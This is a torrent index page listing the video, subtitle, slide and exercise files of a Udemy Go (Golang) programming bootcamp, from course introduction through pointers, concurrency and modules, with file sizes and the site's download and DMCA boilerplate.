[Udemy] Программирование на Go (Golang) Bootcamp по Go 2021 (2020)

mp4   Hot:67   Size:5.93 GB   Created:2022-05-13 04:04:05   Update:2024-05-11 19:36:00  

File List

  • 22 Pointers in Go/146 Passing Pointers to Functions. Passing by Value vs. Passing by Pointer - Part 2.mp4 129.83 MB
    01 Course Introduction/001 Why Go Programming_ Why now_.mp4 21.04 MB
    01 Course Introduction/002 IMPORTANT. Please read!.html 2.52 KB
    01 Course Introduction/003 How to Get the Most Out of This Course.en.srt 3.49 KB
    01 Course Introduction/003 How to Get the Most Out of This Course.mp4 32.11 MB
    01 Course Introduction/004 How to Get Better and Faster Support_ JOIN OUR ONLINE COMMUNITY!.html 2.09 KB
    01 Course Introduction/external-assets-links.txt 206 B
    02 Getting Started/005 The Go Playground. Your First Go Program.en.srt 6.86 KB
    02 Getting Started/005 The Go Playground. Your First Go Program.mp4 37.18 MB
    02 Getting Started/006 Setup the Programming Environment on Windows (Go, Git and VSCode).en.srt 8.02 KB
    02 Getting Started/006 Setup the Programming Environment on Windows (Go, Git and VSCode).mp4 79.17 MB
    02 Getting Started/007 Setup the Programming Environment on Linux (Go and VSCode).html 10.15 KB
    02 Getting Started/008 Setup the Programming Environment on macOS (Go, Git and VSCode).html 8.49 KB
    02 Getting Started/009 GOPATH and Code Organization.en.srt 5.13 KB
    02 Getting Started/009 GOPATH and Code Organization.mp4 64.06 MB
    02 Getting Started/009 Slides-GOPATH-and-Code-Organization.pdf 45.87 KB
    02 Getting Started/010 Go Application Structure.en.srt 6.95 KB
    02 Getting Started/010 Go Application Structure.mp4 51.29 MB
    02 Getting Started/011 Coding - Go Application Structure.html 2.71 KB
    02 Getting Started/012 Compiling (go build) and Running Go Applications (go run).en.srt 8.18 KB
    02 Getting Started/012 Compiling (go build) and Running Go Applications (go run).mp4 124.06 MB
    02 Getting Started/012 Slides-Compiling-go-build-and-Running-Go-Applications-go-run.pdf 40.66 KB
    02 Getting Started/013 Go Packages and Modules.html 1.52 KB
    02 Getting Started/014 Formatting Go Source Code (gofmt).en.srt 5.51 KB
    02 Getting Started/014 Formatting Go Source Code (gofmt).mp4 41.56 MB
    02 Getting Started/014 Slides-Formatting-Go-Source-Code-gofmt.pdf 34.88 KB
    02 Getting Started/external-assets-links.txt 68 B
    03 Challenge Hands-On Exercises - Getting Started/015 Hands-On Exercices.html 4.17 KB
    04 Go Basics/016 Slides-Variables.pdf 42.94 KB
    04 Go Basics/016 Variables in Go.en.srt 9.31 KB
    04 Go Basics/016 Variables in Go.mp4 48.73 MB
    04 Go Basics/017 Multiple Declarations.en.srt 6.25 KB
    04 Go Basics/017 Multiple Declarations.mp4 44.38 MB
    04 Go Basics/018 Coding - Variables and Declarations.html 6.33 KB
    04 Go Basics/019 Types and Zero Values.en.srt 5.42 KB
    04 Go Basics/019 Types and Zero Values.mp4 20.55 MB
    04 Go Basics/020 Coding - Types and Zero Values.html 3.82 KB
    04 Go Basics/021 Comments.en.srt 3.2 KB
    04 Go Basics/021 Comments.mp4 7.96 MB
    04 Go Basics/022 Naming Conventions in Go.en.srt 7.02 KB
    04 Go Basics/022 Naming Conventions in Go.mp4 50.24 MB
    04 Go Basics/022 Slides-Naming-Convensions-in-Go.pdf 58.65 KB
    04 Go Basics/023 Coding - Comments and Naming Convention.html 3.43 KB
    04 Go Basics/024 Package fmt.en.srt 12.81 KB
    04 Go Basics/024 Package fmt.mp4 124.59 MB
    04 Go Basics/025 Coding - Package fmt.html 5.98 KB
    04 Go Basics/026 Constants in Go.en.srt 8.11 KB
    04 Go Basics/026 Constants in Go.mp4 64.77 MB
    04 Go Basics/026 Slides-Constants-in-Go.pdf 29.13 KB
    04 Go Basics/027 Constant Rules.en.srt 3.24 KB
    04 Go Basics/027 Constant Rules.mp4 30.7 MB
    04 Go Basics/028 Constant Expressions. Typed vs. Untyped Constants.en.srt 6.85 KB
    04 Go Basics/028 Constant Expressions. Typed vs. Untyped Constants.mp4 50.77 MB
    04 Go Basics/029 IOTA.en.srt 3.82 KB
    04 Go Basics/029 IOTA.mp4 28.61 MB
    04 Go Basics/030 Coding - Constants and IOTA.html 7.04 KB
    04 Go Basics/031 Go Data Types - Part 1.en.srt 6.63 KB
    04 Go Basics/031 Go Data Types - Part 1.mp4 76.35 MB
    04 Go Basics/031 Slides-Go-Types.pdf 58.81 KB
    04 Go Basics/032 Go Data Types - Part 2.en.srt 5.31 KB
    04 Go Basics/032 Go Data Types - Part 2.mp4 53.88 MB
    04 Go Basics/033 Coding - Go Data Types.html 7.82 KB
    04 Go Basics/034 Operations on Types_ Arithmetic and Assignment Operators.en.srt 8.24 KB
    04 Go Basics/034 Operations on Types_ Arithmetic and Assignment Operators.mp4 59.55 MB
    04 Go Basics/034 Slides-Operators1.pdf 30.57 KB
    04 Go Basics/035 Comparison and Logical Operators.en.srt 5.65 KB
    04 Go Basics/035 Comparison and Logical Operators.mp4 35.62 MB
    04 Go Basics/035 Slides-Operators2.pdf 14.24 KB
    04 Go Basics/036 Coding - Go Operators.html 6.48 KB
    04 Go Basics/037 Overflows.en.srt 6.01 KB
    04 Go Basics/037 Overflows.mp4 19.04 MB
    04 Go Basics/038 Converting Numeric Types.en.srt 4.91 KB
    04 Go Basics/038 Converting Numeric Types.mp4 33.68 MB
    04 Go Basics/039 Converting Numbers to Strings and Strings to Numbers.en.srt 6.59 KB
    04 Go Basics/039 Converting Numbers to Strings and Strings to Numbers.mp4 59.41 MB
    04 Go Basics/040 Coding - Converting Types.html 5.41 KB
    04 Go Basics/041 Defined (Named) Types - part 1.en.srt 2.75 KB
    04 Go Basics/041 Defined (Named) Types - part 1.mp4 24.2 MB
    04 Go Basics/041 Slides-Defined-Types.pdf 38.24 KB
    04 Go Basics/042 Defined (Named) Types - part 2.en.srt 5.07 KB
    04 Go Basics/042 Defined (Named) Types - part 2.mp4 45.42 MB
    04 Go Basics/043 Coding - Defined Types.html 2.63 KB
    04 Go Basics/044 Alias Declarations.en.srt 3.17 KB
    04 Go Basics/044 Alias Declarations.mp4 13.86 MB
    04 Go Basics/045 Coding - Aliases.html 2.39 KB
    04 Go Basics/external-assets-links.txt 205 B
    05 Coding Challenges - Go Basics/046 Declare Variables.html 4.9 KB
    05 Coding Challenges - Go Basics/047 Constant.html 5.42 KB
    05 Coding Challenges - Go Basics/048 Package fmt.html 3.55 KB
    05 Coding Challenges - Go Basics/049 Operators and Conversions.html 5.84 KB
    05 Coding Challenges - Go Basics/050 Named Types and Aliases.html 4.19 KB
    06 Program Flow Control in Go/051 If, Else If and Else Statements.en.srt 7.2 KB
    06 Program Flow Control in Go/051 If, Else If and Else Statements.mp4 55.87 MB
    06 Program Flow Control in Go/052 Coding - If, Else If and Else.html 3.37 KB
    06 Program Flow Control in Go/053 Command Line Arguments_ os.Args.en.srt 5.76 KB
    06 Program Flow Control in Go/053 Command Line Arguments_ os.Args.mp4 60.38 MB
    06 Program Flow Control in Go/054 Coding - Command Line Arguments.html 1.94 KB
    06 Program Flow Control in Go/055 Simple If Statement.en.srt 8.01 KB
    06 Program Flow Control in Go/055 Simple If Statement.mp4 44.87 MB
    06 Program Flow Control in Go/056 Coding - Simple If.html 2.28 KB
    06 Program Flow Control in Go/057 For Loops.en.srt 3.64 KB
    06 Program Flow Control in Go/057 For Loops.mp4 14.41 MB
    06 Program Flow Control in Go/058 Where is the While Loop in Go_.en.srt 2.56 KB
    06 Program Flow Control in Go/058 Where is the While Loop in Go_.mp4 13.35 MB
    06 Program Flow Control in Go/059 Coding - For Loops.html 2.22 KB
    06 Program Flow Control in Go/060 For and Continue Statements.en.srt 2.15 KB
    06 Program Flow Control in Go/060 For and Continue Statements.mp4 10.86 MB
    06 Program Flow Control in Go/061 For and Break Statements.en.srt 2.96 KB
    06 Program Flow Control in Go/061 For and Break Statements.mp4 16.95 MB
    06 Program Flow Control in Go/062 Coding - For, Break and Continue.html 3.9 KB
    06 Program Flow Control in Go/063 Label Statement.en.srt 5.45 KB
    06 Program Flow Control in Go/063 Label Statement.mp4 40.69 MB
    06 Program Flow Control in Go/063 Slides-Labels.pdf 28.45 KB
    06 Program Flow Control in Go/064 Goto.en.srt 2.83 KB
    06 Program Flow Control in Go/064 Goto.mp4 15.38 MB
    06 Program Flow Control in Go/065 Coding - Labels and Goto Statements.html 4.21 KB
    06 Program Flow Control in Go/066 Switch Statement.en.srt 7.88 KB
    06 Program Flow Control in Go/066 Switch Statement.mp4 67.41 MB
    06 Program Flow Control in Go/067 Coding - Switch Statement.html 4.31 KB
    06 Program Flow Control in Go/068 Scopes in Go.en.srt 7.45 KB
    06 Program Flow Control in Go/068 Scopes in Go.mp4 70.59 MB
    06 Program Flow Control in Go/068 Slides-Scopes.pdf 43.55 KB
    06 Program Flow Control in Go/069 Coding - Scopes.html 2.94 KB
    07 Coding Challenges - Flow Control/070 Coding Challenge Exercises - Flow Control.html 4.51 KB
    08 Arrays in Go/071 Intro to Arrays.en.srt 2.84 KB
    08 Arrays in Go/071 Intro to Arrays.mp4 21.47 MB
    08 Arrays in Go/071 Slides-Arrays-in-Go.pdf 35.55 KB
    08 Arrays in Go/072 Declaring Arrays.en.srt 4.68 KB
    08 Arrays in Go/072 Declaring Arrays.mp4 43.31 MB
    08 Arrays in Go/073 Array Operations.en.srt 6.67 KB
    08 Arrays in Go/073 Array Operations.mp4 62.07 MB
    08 Arrays in Go/074 Coding - Declaring Arrays and Operations.html 7.2 KB
    08 Arrays in Go/075 Arrays with Keyed Elements.en.srt 6.04 KB
    08 Arrays in Go/075 Arrays with Keyed Elements.mp4 44.86 MB
    08 Arrays in Go/076 Coding - Arrays with Keyed Elements.html 3.05 KB
    09 Coding Challenges - Arrays/077 Array Coding Exercises.html 4.19 KB
    10 Slices in Go/078 Intro to Slices.en.srt 1.78 KB
    10 Slices in Go/078 Intro to Slices.mp4 17.06 MB
    10 Slices in Go/078 Slides-Slices-in-Go.pdf 33.92 KB
    10 Slices in Go/079 Declaring Slices and Basic Slice Operations.en.srt 6.21 KB
    10 Slices in Go/079 Declaring Slices and Basic Slice Operations.mp4 60.82 MB
    10 Slices in Go/080 Comparing Slices.en.srt 4.94 KB
    10 Slices in Go/080 Comparing Slices.mp4 43.8 MB
    10 Slices in Go/081 Coding - Slice Basics.html 7.02 KB
    10 Slices in Go/082 Appending to a Slice. Copying Slices.en.srt 4.26 KB
    10 Slices in Go/082 Appending to a Slice. Copying Slices.mp4 37.8 MB
    10 Slices in Go/083 Slice Expressions.en.srt 5.23 KB
    10 Slices in Go/083 Slice Expressions.mp4 45.16 MB
    10 Slices in Go/084 Coding - Slice Expressions.html 4.69 KB
    10 Slices in Go/085 Slice Internals_ Backing Array and Slice Header -part 1.en.srt 5.21 KB
    10 Slices in Go/085 Slice Internals_ Backing Array and Slice Header -part 1.mp4 49.1 MB
    10 Slices in Go/086 Slice Internals_ Backing Array and Slice Header - part 2.en.srt 7.03 KB
    10 Slices in Go/086 Slice Internals_ Backing Array and Slice Header - part 2.mp4 75.61 MB
    10 Slices in Go/087 Coding - Slice's Backing Array.html 4.58 KB
    10 Slices in Go/088 Append, Length and Capacity In-Depth.en.srt 6.53 KB
    10 Slices in Go/088 Append, Length and Capacity In-Depth.mp4 71.88 MB
    10 Slices in Go/089 Coding - Appending to Slices.html 4.39 KB
    10 Slices in Go/external-assets-links.txt 191 B
    11 Coding Challenges - Slices/090 Coding Challenge Exercises - Slices.html 7.04 KB
    12 Strings, Runes, Bytes and UTF-8 in Go/091 Intro to Strings.en.srt 6.8 KB
    12 Strings, Runes, Bytes and UTF-8 in Go/091 Intro to Strings.mp4 67.9 MB
    12 Strings, Runes, Bytes and UTF-8 in Go/091 Slides-Strings-in-Go.pdf 43.67 KB
    12 Strings, Runes, Bytes and UTF-8 in Go/092 Coding - String Basics.html 4.19 KB
    12 Strings, Runes, Bytes and UTF-8 in Go/093 Intro to Runes, Bytes and Unicode Code Points.en.srt 3 KB
    12 Strings, Runes, Bytes and UTF-8 in Go/093 Intro to Runes, Bytes and Unicode Code Points.mp4 43.97 MB
    12 Strings, Runes, Bytes and UTF-8 in Go/094 Coding Runes and Strings. Decoding Strings Byte by Byte and Rune by Rune.en.srt 5.39 KB
    12 Strings, Runes, Bytes and UTF-8 in Go/094 Coding Runes and Strings. Decoding Strings Byte by Byte and Rune by Rune.mp4 51.85 MB
    12 Strings, Runes, Bytes and UTF-8 in Go/095 String Length in Bytes and Runes.en.srt 2.86 KB
    12 Strings, Runes, Bytes and UTF-8 in Go/095 String Length in Bytes and Runes.mp4 19.42 MB
    12 Strings, Runes, Bytes and UTF-8 in Go/096 Coding - Strings, Runes and Decoding.html 5.11 KB
    12 Strings, Runes, Bytes and UTF-8 in Go/097 Slicing Strings.en.srt 3.21 KB
    12 Strings, Runes, Bytes and UTF-8 in Go/097 Slicing Strings.mp4 23.27 MB
    12 Strings, Runes, Bytes and UTF-8 in Go/098 Coding - Slicing Strings.html 2.32 KB
    12 Strings, Runes, Bytes and UTF-8 in Go/099 Strings Package Part1_ Contains, ContainsAny, Count, ToLower, ToUpper, EqualFold.en.srt 6.71 KB
    12 Strings, Runes, Bytes and UTF-8 in Go/099 Strings Package Part1_ Contains, ContainsAny, Count, ToLower, ToUpper, EqualFold.mp4 57.56 MB
    12 Strings, Runes, Bytes and UTF-8 in Go/100 Strings Package Part2. Manipulating Strings_ Repeat, Replace, Split, Join, Field.en.srt 7.56 KB
    12 Strings, Runes, Bytes and UTF-8 in Go/100 Strings Package Part2. Manipulating Strings_ Repeat, Replace, Split, Join, Field.mp4 94.88 MB
    12 Strings, Runes, Bytes and UTF-8 in Go/101 Coding - Strings Package.html 8.98 KB
    12 Strings, Runes, Bytes and UTF-8 in Go/external-assets-links.txt 91 B
    13 Coding Challenges - Strings/102 Coding Challenge Exercises - Strings.html 5.92 KB
    14 Maps in Go/103 Intro to Maps.en.srt 3.79 KB
    14 Maps in Go/103 Intro to Maps.mp4 34.13 MB
    14 Maps in Go/103 Slides-Maps-in-Go.pdf 28.96 KB
    14 Maps in Go/104 Declaring Maps, Working with Maps.en.srt 12.25 KB
    14 Maps in Go/104 Declaring Maps, Working with Maps.mp4 119.04 MB
    14 Maps in Go/105 Comparing Maps.en.srt 3.06 KB
    14 Maps in Go/105 Comparing Maps.mp4 25.62 MB
    14 Maps in Go/106 Map Header. Cloning Maps.en.srt 4.45 KB
    14 Maps in Go/106 Map Header. Cloning Maps.mp4 32.61 MB
    14 Maps in Go/107 Coding - Maps in Go.html 10.9 KB
    14 Maps in Go/external-assets-links.txt 68 B
    15 Coding Challenges -Maps/108 Coding Challenge Exercises - Maps.html 3.74 KB
    16 Working with Files in Go/109 Open, Close, Rename, Move, Remove Files.en.srt 12.91 KB
    16 Working with Files in Go/109 Open, Close, Rename, Move, Remove Files.mp4 120.75 MB
    16 Working with Files in Go/110 Coding - Operations on Files.html 6.82 KB
    16 Working with Files in Go/111 Writing Bytes to File_ os.Write and ioutil.WriteFile.en.srt 6.72 KB
    16 Working with Files in Go/111 Writing Bytes to File_ os.Write and ioutil.WriteFile.mp4 49.39 MB
    16 Working with Files in Go/112 Coding - Writing to Files Using os and ioutil.html 4.02 KB
    16 Working with Files in Go/113 Writing to Files using a Buffered Writer (bufio Package).en.srt 6.7 KB
    16 Working with Files in Go/113 Writing to Files using a Buffered Writer (bufio Package).mp4 65.27 MB
    16 Working with Files in Go/114 Coding - Writing to Files Using a Buffer in Memory.html 4.51 KB
    16 Working with Files in Go/115 Reading n Bytes from a File. Reading a File using a Buffered Reader.en.srt 5.5 KB
    16 Working with Files in Go/115 Reading n Bytes from a File. Reading a File using a Buffered Reader.mp4 61.82 MB
    16 Working with Files in Go/116 Coding - Reading Bytes from Files.html 4.67 KB
    16 Working with Files in Go/117 Reading a File Line by Line Using a Scanner.en.srt 5.76 KB
    16 Working with Files in Go/117 Reading a File Line by Line Using a Scanner.mp4 56.5 MB
    16 Working with Files in Go/118 Coding - Reading Files Using a Delimiter.html 4.55 KB
    16 Working with Files in Go/119 Scanning for User Input. Reading From Stdin.en.srt 4.99 KB
    16 Working with Files in Go/119 Scanning for User Input. Reading From Stdin.mp4 53.45 MB
    16 Working with Files in Go/120 Coding - Reading from Console.html 3.2 KB
    17 Coding Challenges - Working with Files/121 Coding Exercises - Working with Files.html 4.49 KB
    18 Structs in Go/122 Organizing Data with Structs.en.srt 2.05 KB
    18 Structs in Go/122 Organizing Data with Structs.mp4 19.12 MB
    18 Structs in Go/122 Slides-Structs-in-Go.pdf 29.33 KB
    18 Structs in Go/123 Creating Structs.en.srt 8.04 KB
    18 Structs in Go/123 Creating Structs.mp4 66.04 MB
    18 Structs in Go/124 Retrieving and Updating Struct Fields.en.srt 5.33 KB
    18 Structs in Go/124 Retrieving and Updating Struct Fields.mp4 45.21 MB
    18 Structs in Go/125 Coding - Working with Structs.html 5.27 KB
    18 Structs in Go/126 Anonymous Structs and Anonymous Struct Fields.en.srt 4.81 KB
    18 Structs in Go/126 Anonymous Structs and Anonymous Struct Fields.mp4 55.17 MB
    18 Structs in Go/127 Embedded Structs.en.srt 4.91 KB
    18 Structs in Go/127 Embedded Structs.mp4 45.57 MB
    18 Structs in Go/128 Coding - Anonymous and Embedded Structs.html 6.69 KB
    19 Coding Challenges - Structs/129 Coding Challenge Exercises - Structs.html 4.47 KB
    20 Functions in Go/130 Intro to Functions.en.srt 2.38 KB
    20 Functions in Go/130 Intro to Functions.mp4 17.91 MB
    20 Functions in Go/130 Slides-Functions-in-Go.pdf 39.65 KB
    20 Functions in Go/131 Function Parameters, Arguments and Return Values.en.srt 8.82 KB
    20 Functions in Go/131 Function Parameters, Arguments and Return Values.mp4 65.13 MB
    20 Functions in Go/132 Coding - Function Basics.html 4 KB
    20 Functions in Go/133 Variadic Functions - Part 1.en.srt 4.45 KB
    20 Functions in Go/133 Variadic Functions - Part 1.mp4 22.18 MB
    20 Functions in Go/134 Variadic Functions - Part 2.en.srt 7.38 KB
    20 Functions in Go/134 Variadic Functions - Part 2.mp4 61.73 MB
    20 Functions in Go/135 Coding - Variadic Functions.html 4.6 KB
    20 Functions in Go/136 Defer Statement.en.srt 4.15 KB
    20 Functions in Go/136 Defer Statement.mp4 31.3 MB
    20 Functions in Go/137 Coding - Defer Statement.html 2.88 KB
    20 Functions in Go/138 Anonymous Functions.en.srt 4.85 KB
    20 Functions in Go/138 Anonymous Functions.mp4 28.04 MB
    20 Functions in Go/139 Coding - Anonymous Functions.html 2.45 KB
    20 Functions in Go/external-assets-links.txt 115 B
    21 Coding Challenges - Functions/140 Coding Challenge Exercises - Functions.html 7.32 KB
    22 Pointers in Go/141 Computer Memory and Pointers.en.srt 3.88 KB
    22 Pointers in Go/141 Computer Memory and Pointers.mp4 38.26 MB
    22 Pointers in Go/141 Slides-Pointers-in-Go.pdf 88.51 KB
    22 Pointers in Go/142 Declaring Pointers. Address of and Dereferencing Operators.en.srt 10.62 KB
    22 Pointers in Go/142 Declaring Pointers. Address of and Dereferencing Operators.mp4 106.69 MB
    22 Pointers in Go/143 Pointer to Pointer. Comparing Pointers.en.srt 4.98 KB
    22 Pointers in Go/143 Pointer to Pointer. Comparing Pointers.mp4 49.33 MB
    22 Pointers in Go/144 Coding - Pointer Basics.html 5.26 KB
    22 Pointers in Go/145 Passing and Returning Pointers From Functions - Part 1.en.srt 5.06 KB
    22 Pointers in Go/145 Passing and Returning Pointers From Functions - Part 1.mp4 31.69 MB
    22 Pointers in Go/146 Passing Pointers to Functions. Passing by Value vs. Passing by Pointer - Part 2.en.srt 12.9 KB
    01 Course Introduction/001 Why Go Programming_ Why now_.en.srt 2.54 KB
    22 Pointers in Go/147 Coding - Passing Values and Pointers to Functions.html 8.45 KB
    23 Coding Challenges - Pointers/148 Coding Challenge Exercises - Pointers.html 3.52 KB
    24 Methods and Interfaces in Go (OOP)/149 Receiver Functions (Methods).en.srt 7.41 KB
    24 Methods and Interfaces in Go (OOP)/149 Receiver Functions (Methods).mp4 58.09 MB
    24 Methods and Interfaces in Go (OOP)/150 Coding - Intro to Methods.html 3.96 KB
    24 Methods and Interfaces in Go (OOP)/151 Methods with a Pointer Receiver.en.srt 9.5 KB
    24 Methods and Interfaces in Go (OOP)/151 Methods with a Pointer Receiver.mp4 77.78 MB
    24 Methods and Interfaces in Go (OOP)/152 Coding - Methods with a Pointer Receiver.html 4.46 KB
    24 Methods and Interfaces in Go (OOP)/153 Intro to Interfaces.en.srt 4.48 KB
    24 Methods and Interfaces in Go (OOP)/153 Intro to Interfaces.mp4 36.37 MB
    24 Methods and Interfaces in Go (OOP)/154 Implementing Interfaces.en.srt 6.7 KB
    24 Methods and Interfaces in Go (OOP)/154 Implementing Interfaces.mp4 63.02 MB
    24 Methods and Interfaces in Go (OOP)/155 Coding - Implementing Interfaces.html 3.96 KB
    24 Methods and Interfaces in Go (OOP)/156 Interface Dynamic Type and Polymorphism.en.srt 4.09 KB
    24 Methods and Interfaces in Go (OOP)/156 Interface Dynamic Type and Polymorphism.mp4 27.27 MB
    24 Methods and Interfaces in Go (OOP)/157 Type Assertions and Type Switches.en.srt 6 KB
    24 Methods and Interfaces in Go (OOP)/157 Type Assertions and Type Switches.mp4 51.27 MB
    24 Methods and Interfaces in Go (OOP)/158 Coding - Type Assertions.html 5.27 KB
    24 Methods and Interfaces in Go (OOP)/159 Embedded Interfaces.en.srt 4.76 KB
    24 Methods and Interfaces in Go (OOP)/159 Embedded Interfaces.mp4 34.11 MB
    24 Methods and Interfaces in Go (OOP)/160 Empty Interface.en.srt 6.73 KB
    24 Methods and Interfaces in Go (OOP)/160 Empty Interface.mp4 46.87 MB
    24 Methods and Interfaces in Go (OOP)/161 Coding - Empty Interface.html 3.48 KB
    25 Coding Challenges - Methods and Interfaces/162 Coding Challenge Exercises - Methods.html 4.93 KB
    25 Coding Challenges - Methods and Interfaces/163 Coding Challenge Exercises - Interfaces.html 4.51 KB
    26 Concurrency in Go/164 Concurrency vs. Parallelism.en.srt 4.1 KB
    26 Concurrency in Go/164 Concurrency vs. Parallelism.mp4 32.54 MB
    26 Concurrency in Go/164 Slides-Concurrency-vs-Parallelism.pdf 18.68 KB
    26 Concurrency in Go/165 Intro to Goroutines.en.srt 4.29 KB
    26 Concurrency in Go/165 Intro to Goroutines.mp4 52.22 MB
    26 Concurrency in Go/165 Slides-Goroutines.pdf 28.36 KB
    26 Concurrency in Go/166 Spawning Goroutines. The go Keyword.en.srt 7.04 KB
    26 Concurrency in Go/166 Spawning Goroutines. The go Keyword.mp4 67.08 MB
    26 Concurrency in Go/167 Coding - Getting Information.html 1.88 KB
    26 Concurrency in Go/168 WaitGroups.en.srt 3.26 KB
    26 Concurrency in Go/168 WaitGroups.mp4 28.86 MB
    26 Concurrency in Go/169 Coding - Goroutines and WaitGroups.html 3.42 KB
    26 Concurrency in Go/170 http-serial.zip 1.14 KB
    26 Concurrency in Go/170 Project_ URL Checker and Page Downloader.en.srt 11.47 KB
    26 Concurrency in Go/170 Project_ URL Checker and Page Downloader.mp4 88.59 MB
    26 Concurrency in Go/171 http-concurrent-waitgroups.zip 1.17 KB
    26 Concurrency in Go/171 Project Refactoring Using WaitGroups _ URL Checker and Page Downloader.en.srt 4.33 KB
    26 Concurrency in Go/171 Project Refactoring Using WaitGroups _ URL Checker and Page Downloader.mp4 36.09 MB
    26 Concurrency in Go/172 Data Race.en.srt 6.47 KB
    26 Concurrency in Go/172 Data Race.mp4 36.47 MB
    26 Concurrency in Go/173 Go Race Detector.en.srt 4.13 KB
    26 Concurrency in Go/173 Go Race Detector.mp4 29.7 MB
    26 Concurrency in Go/174 Coding - Data Race.html 2.29 KB
    26 Concurrency in Go/175 Mutexes.en.srt 4.45 KB
    26 Concurrency in Go/175 Mutexes.mp4 30.56 MB
    26 Concurrency in Go/176 Coding - Mutexes.html 2.17 KB
    26 Concurrency in Go/177 Intro to Channels.en.srt 8.58 KB
    26 Concurrency in Go/177 Intro to Channels.mp4 69.58 MB
    26 Concurrency in Go/178 Coding - Intro to Channels.html 2.05 KB
    26 Concurrency in Go/179 Goroutines and Channels.en.srt 4.56 KB
    26 Concurrency in Go/179 Goroutines and Channels.mp4 25.97 MB
    26 Concurrency in Go/180 Goroutines, Channels and Anonymous Function.en.srt 2.4 KB
    26 Concurrency in Go/180 Goroutines, Channels and Anonymous Function.mp4 22.33 MB
    26 Concurrency in Go/181 Coding - Goroutines and Channels.html 2.38 KB
    26 Concurrency in Go/182 http-concurrent-channels.zip 1.13 KB
    26 Concurrency in Go/182 Project Refactoring Using Channels_ URL Checker and Page Downloader.en.srt 7.44 KB
    26 Concurrency in Go/182 Project Refactoring Using Channels_ URL Checker and Page Downloader.mp4 68.32 MB
    26 Concurrency in Go/183 http-concurrent-channel-anonymous.zip 965 B
    26 Concurrency in Go/183 Project Refactoring Using Channels and Anonymous Function.en.srt 6.4 KB
    26 Concurrency in Go/183 Project Refactoring Using Channels and Anonymous Function.mp4 61.17 MB
    26 Concurrency in Go/184 Unbuffered Channels.en.srt 3.59 KB
    26 Concurrency in Go/184 Unbuffered Channels.mp4 30.04 MB
    26 Concurrency in Go/185 Coding - Unbuffered Channels.html 2.19 KB
    26 Concurrency in Go/186 Buffered Channels.en.srt 8.32 KB
    26 Concurrency in Go/186 Buffered Channels.mp4 72.75 MB
    26 Concurrency in Go/187 Coding - Buffered Channels.html 2.88 KB
    26 Concurrency in Go/188 Select Statement.en.srt 5.75 KB
    26 Concurrency in Go/188 Select Statement.mp4 43.12 MB
    26 Concurrency in Go/189 Coding - Select Statement.html 2.46 KB
    26 Concurrency in Go/external-assets-links.txt 212 B
    27 Coding Challenges - Concurrency/190 Coding Challenge Exercises - Goroutines, WaitGroups and Mutexes.html 5.67 KB
    27 Coding Challenges - Concurrency/191 Coding Challenge Exercises - Goroutines and Channels.html 4.6 KB
    28 Go Packages and Modules/192 Go Packages Overview.en.srt 2.73 KB
    28 Go Packages and Modules/192 Go Packages Overview.mp4 28.55 MB
    28 Go Packages and Modules/192 Packages-GOPATH-and-Code-Organization.pdf 48.85 KB
    28 Go Packages and Modules/193 Creating a Package.en.srt 9.36 KB
    28 Go Packages and Modules/193 Creating a Package.mp4 85.72 MB
    28 Go Packages and Modules/194 GOPATH and Packages In Depth.en.srt 7.59 KB
    28 Go Packages and Modules/194 GOPATH and Packages In Depth.mp4 76.77 MB
    28 Go Packages and Modules/195 Exporting Names. Private vs. Private Access.en.srt 5.67 KB
    28 Go Packages and Modules/195 Exporting Names. Private vs. Private Access.mp4 62.76 MB
    28 Go Packages and Modules/196 Import Statement and Scopes.en.srt 8.38 KB
    28 Go Packages and Modules/196 Import Statement and Scopes.mp4 98.39 MB
    28 Go Packages and Modules/197 The Init function.en.srt 4.38 KB
    28 Go Packages and Modules/197 The Init function.mp4 27.95 MB
    28 Go Packages and Modules/198 Go Modules Overview.en.srt 4.44 KB
    28 Go Packages and Modules/198 Go Modules Overview.mp4 39.31 MB
    28 Go Packages and Modules/198 Modules.pdf 40.62 KB
    28 Go Packages and Modules/199 Importing and Using Go Modules.en.srt 8.47 KB
    28 Go Packages and Modules/199 Importing and Using Go Modules.mp4 64.52 MB
    28 Go Packages and Modules/200 Creating Your Own Go Module.en.srt 5.48 KB
    28 Go Packages and Modules/200 Creating Your Own Go Module.mp4 38.15 MB
    28 Go Packages and Modules/201 Publish the Module on GitHub. Semantic Versioning.en.srt 9.96 KB
    28 Go Packages and Modules/201 Publish the Module on GitHub. Semantic Versioning.mp4 92.42 MB
    28 Go Packages and Modules/202 Commands - Create and Publish a Module on GitHub.html 4.21 KB
    28 Go Packages and Modules/203 Releasing a Bug Fix and a Minor Update.en.srt 6.5 KB
    28 Go Packages and Modules/203 Releasing a Bug Fix and a Minor Update.mp4 65.31 MB
    28 Go Packages and Modules/204 Releasing a Major Update.en.srt 5.41 KB
    28 Go Packages and Modules/204 Releasing a Major Update.mp4 56.48 MB
    28 Go Packages and Modules/205 Using Multi-Version Dependency.en.srt 2.39 KB
    28 Go Packages and Modules/205 Using Multi-Version Dependency.mp4 25.54 MB
    28 Go Packages and Modules/external-assets-links.txt 48 B
    29 Challenge Hands-On Exercises - Packages and Modules/206 Hands-On Exercises.html 2.7 KB
    30 Contents to Come in 2020!/207 New Content to be Added.html 2.31 KB
    31 Course Completion/208 Congratulations.html 2.99 KB
    31 Course Completion/209 BONUS_ Special Thank You Gift!.html 4.76 KB

Download Info

  • Tips

    “[Udemy] Программирование на Go (Golang) Bootcamp по Go 2021 (2020)” Its related downloads are collected from the DHT sharing network, the site will be 24 hours of real-time updates, to ensure that you get the latest resources.This site is not responsible for the authenticity of the resources, please pay attention to screening.If found bad resources, please send a report below the right, we will be the first time shielding.

  • DMCA Notice and Takedown Procedure

    If this resource infringes your copyright, please email([email protected]) us or leave your message here ! we will block the download link as soon as possiable.

